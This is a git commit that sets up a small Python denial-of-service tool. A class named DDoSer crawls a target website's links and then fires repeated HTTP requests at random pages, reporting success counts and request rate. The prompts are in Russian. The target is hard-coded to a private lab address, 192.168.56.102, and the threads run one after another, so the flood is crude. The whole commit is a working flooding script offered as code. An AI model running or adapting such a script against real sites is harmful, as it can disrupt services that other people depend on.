init

2026-03-06 01:56:23 +03:00 · 2020-04-19 22:53:20 +03:00
commit 6de8735eb5
3 changed files with 205 additions and 0 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -0,0 +1,5 @@
+./idea
+./venv
+./vscode
+./data.db
+./__pycache__
--- a/init.py
+++ b/init.py
@@ -0,0 +1,83 @@
+import os
+import link_extractor
+import time
+import random
+import progressbar
+# import urllib.request as requests # urlib
+# import faster_than_requests as requests # faster_than_requests
+import requests
+from datetime import datetime
+ 
+from threading import Thread
+
+global requestCountSuccess, requestCountExecuted
+
+if not os.path.exists('./maps/'):
+    os.makedirs('./maps/')
+
+
+def url_grab(full_url):
+
+    if os.path.exists(f'./maps/{url}'):
+
+        with open(f'./maps/{url}', 'r') as f:
+            subUrls = f.read().splitlines()
+    else:
+
+        subUrls = link_extractor.extractor('http://' + url)
+
+        os.mknod(f'./maps/{url}')
+        with open(f'./maps/{url}', 'w') as f:
+            for link in subUrls:
+                print(link.strip(), file=f)
+
+
+    print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
+    return subUrls
+
+
+class DDoSer(Thread):
+	def __init__(self, url):
+		Thread.__init__(self)
+		self.url = url
+		
+	def run(self):
+
+		global requestCountSuccess, requestCountExecuted
+
+		# responce = requests.urlopen(self.url).getcode() # urlib
+		responce = requests.get(self.url).status_code
+		if responce == 200:
+			requestCountSuccess += 1
+
+		requestCountExecuted += 1
+
+
+if __name__ == '__main__':
+
+    # url = input(datetime.now().strftime('[%x %X] ') + 'Введите адрес сайта: ')
+    url = '192.168.56.102'
+
+    subUrls = url_grab(url)
+
+    requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: '))
+    print()
+
+    startTime = time.time()   
+    requestCountExecuted = 0
+    requestCountSuccess = 0
+
+    with progressbar.ProgressBar(max_value=requestCount) as bar:
+	    for i in range(requestCount):
+	    	url = random.choice(subUrls)
+	    	thread = DDoSer(url)
+	    	thread.start()
+	    	thread.join()
+	    	bar.update(requestCountExecuted)
+    	
+	    while requestCountExecuted < requestCount:
+	    	bar.update(requestCountExecuted)
+
+    print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted))
+    print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess))
+    print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(round(requestCountExecuted/(time.time() - startTime))) + ' з/с')
--- a/link_extractor.py
+++ b/link_extractor.py
@@ -0,0 +1,117 @@
+# https://github.com/x4nth055/pythoncode-tutorials/tree/master/web-scraping/link-extractor
+
+import requests
+from urllib.request import urlparse, urljoin
+from bs4 import BeautifulSoup
+import colorama
+
+# init the colorama module
+colorama.init()
+
+GREEN = colorama.Fore.GREEN
+GRAY = colorama.Fore.LIGHTBLACK_EX
+RESET = colorama.Fore.RESET
+
+# initialize the set of links (unique links)
+internal_urls = set()
+external_urls = set()
+
+total_urls_visited = 0
+
+
+def is_valid(url):
+    """
+    Checks whether `url` is a valid URL.
+    """
+    parsed = urlparse(url)
+    return bool(parsed.netloc) and bool(parsed.scheme)
+
+
+def get_all_website_links(url):
+    """
+    Returns all URLs that is found on `url` in which it belongs to the same website
+    """
+    # all URLs of `url`
+    urls = set()
+    # domain name of the URL without the protocol
+    domain_name = urlparse(url).netloc
+    soup = BeautifulSoup(requests.get(url).content, "html.parser")
+    for a_tag in soup.findAll("a"):
+        href = a_tag.attrs.get("href")
+        if href == "" or href is None:
+            # href empty tag
+            continue
+        # join the URL if it's relative (not absolute link)
+        href = urljoin(url, href)
+        parsed_href = urlparse(href)
+        # remove URL GET parameters, URL fragments, etc.
+        href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
+        if not is_valid(href):
+            # not a valid URL
+            continue
+        if href in internal_urls:
+            # already in the set
+            continue
+        if domain_name not in href:
+            # external link
+            if href not in external_urls:
+                print(f"{GRAY}[!] External link: {href}{RESET}")
+                external_urls.add(href)
+            continue
+        print(f"{GREEN}{href}{RESET}")
+        urls.add(href)
+        internal_urls.add(href)
+    return urls
+
+
+def crawl(url, max_urls=50):
+    """
+    Crawls a web page and extracts all links.
+    You'll find all links in `external_urls` and `internal_urls` global set variables.
+    params:
+        max_urls (int): number of max urls to crawl, default is 30.
+    """
+    global total_urls_visited
+    total_urls_visited += 1
+    links = get_all_website_links(url)
+    for link in links:
+        if total_urls_visited > max_urls:
+            break
+        crawl(link, max_urls=max_urls)
+
+
+def extractor(url):
+
+    crawl(url)
+
+    return internal_urls
+
+
+if __name__ == "__main__":
+
+    import argparse
+    parser = argparse.ArgumentParser(description="Link Extractor Tool with Python")
+    parser.add_argument("url", help="The URL to extract links from.")
+    parser.add_argument("-m", "--max-urls", help="Number of max URLs to crawl, default is 30.", default=30, type=int)
+    
+    args = parser.parse_args()
+    url = args.url
+    max_urls = args.max_urls
+
+    crawl(url, max_urls=max_urls)
+
+    print("[+] Total Internal links:", len(internal_urls))
+    print("[+] Total External links:", len(external_urls))
+    print("[+] Total URLs:", len(external_urls) + len(internal_urls))
+
+    domain_name = urlparse(url).netloc
+
+    # save the internal links to a file
+    with open(f"{domain_name}_internal_links.txt", "w") as f:
+        for internal_link in internal_urls:
+            print(internal_link.strip(), file=f)
+
+    # save the external links to a file
+    with open(f"{domain_name}_external_links.txt", "w") as f:
+        for external_link in external_urls:
+            print(external_link.strip(), file=f)